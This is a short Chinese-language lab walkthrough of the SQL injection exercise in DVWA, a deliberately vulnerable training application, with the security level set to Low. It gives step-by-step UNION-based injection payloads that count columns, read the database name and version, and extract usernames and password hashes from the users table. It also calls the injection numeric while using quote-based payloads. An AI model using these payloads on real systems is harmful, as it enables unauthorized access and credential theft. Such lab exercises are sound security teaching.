首先先启动网站,点击DVWA Security 将安全等级改为Low后提交即可。
点击SQL Injection ,输入:1,判断注入类型是数字型还是字符型。
根据返回信息,所以知道是数字型
输入:1’ ORDER BY 1#
输入:1’ ORDER BY 2#
输入 :1’ ORDER BY 3# ,发现报错信息,由此可以判断字段不超过3。
由于我们知道只有两个字段,所以可以输入:1’ UNION SELECT 1,2#
输入:1’ union select database(),version()#,获取数据库和版本的信息, 我们可以知道数据库叫dvwa,版本是5.7.26。
输入:1’ union select concat(user,’-’,password),2 from dvwa.users#,返回用户名和密码。
参考博文:https://blog.csdn.net/qq_43623470/article/details/86508164